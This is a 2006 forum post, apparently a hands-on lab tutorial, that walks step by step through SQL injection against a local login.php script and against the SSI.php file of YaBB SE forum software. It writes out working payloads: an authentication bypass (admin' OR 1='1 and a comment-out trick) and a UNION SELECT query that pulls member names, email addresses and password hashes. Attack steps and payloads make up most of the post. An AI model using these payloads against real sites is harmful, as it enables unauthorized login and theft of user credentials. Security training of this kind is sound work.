zbeng Posted November 14, 2006 Report Share Posted November 14, 2006 I. Manipulating login.php Script[01] Open the terminal and type (without prepending prompt symbols):$ su -# sql_tutorial_startThese commands will start all needed services in the background.[02] Open the browser and check http://localhost/phpmyadmin/.[03] Have a look at the databse userdb that our login.php script is accessing[04] Have a look at login.php script. To do this, open another terminal and type:$ vi login.phpor, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):$ mcedit login.php[05] If you want to see the submitted query to get more information, delete prepending slashes in echo "$query " line:[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:SQL_tutorial_02[07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.[09] Enter admin' OR 1=1 as username and see what happens.[10] Out of the query we can see that we have a closing single quote that isn't opened.[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:[12] To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query:SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid.II. UNION SELECT[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.[02] Open the script in the console by typing:$ vi /yabbse/SSI.phpor use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?function=recentTopics.[04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack.[05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.[06] Go to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then.[07] Move your browser to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:[08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.[09] Move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted: [10] Return to a terminal opened at the beginning (or open a new one) and issue commands:$ su -# sql_tutorial_stopThis will stop all services needed to pass through this tutorial. Quote Link to comment Share on other sites More sharing options...